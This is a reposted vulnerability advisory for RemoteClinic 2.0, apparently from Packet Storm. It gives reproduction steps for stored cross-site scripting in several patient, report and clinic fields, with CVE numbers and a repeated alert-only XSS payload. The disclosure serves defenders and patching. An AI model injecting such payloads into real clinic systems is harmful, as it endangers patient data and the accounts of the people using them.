RemoteClinic 2.0 Cross Site Scripting

#221
Topic created · 1 Posts · 0 Views
  • RemoteClinic version 2.0 suffers from multiple persistent cross site scripting vulnerabilities.
    MD5 | 595ad2c6469d900f430693ecfc6768cb
    Download

    # Exploit Title: RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)  
    # Date: 13/04/2021  
    # Exploit Author: Saud Ahmad  
    # Vendor Homepage: https://remoteclinic.io/  
    # Software Link: https://github.com/remoteclinic/RemoteClinic  
    # Version: 2.0  
    # Tested on: Windows 10  
    # CVE : CVE-2021-30030, CVE-2021-30034, CVE-2021-30039, CVE-2021-30042  
    #Steps to Reproduce:  
    1)Login in Application as Doctor.  
    2)Register a Patient with Full Name Field as XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>  
    3)After Register Patient, go to "Patients" endpoint.  
    4)XSS Executed.  
    For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/1  
    #Steps to Reproduce:  
    1)Login in Application as Doctor.  
    2)Register a Patient.  
    3)After Register Patient, a page redirect to Register Report Page.   
    4)Here is "Symptoms" Field as XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>  
    4)After Register Report, Click on home which is "dashboard" endpoint.  
    5)XSS Executed.  
    For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/5  
    #Steps to Reproduce:  
    1)Login in Application as Doctor.  
    2)Register a Patient.  
    3)After Register Patient, a page redirect to Register Report Page.   
    4)When you scroll down page two fields there "Fever" and "Blood Pressure", both are vulnerable to XSS, inject XSS Payload in both Fields: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>  
    4)After Register Report, Click on home.  
    5)Now Click on Report, XSS Executed.  
    For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/8  
    #Steps to Reproduce:  
    1)Login in Application as Doctor.  
    2)Register a New Clinic.  
    3)Here is four fields "Clinic Name", "Clinic Address", "Clinic City" and "Clinic Contact". All are vulnerable to XSS.   
    4)Inject XSS Payload in all Fields: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)>  
    4)Now go to Clinic Directory.  
    5)Click on that Clinic.  
    6)XSS Executed.  
    For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/11  
    

    Source: packetstormsecurity.com

Log in to reply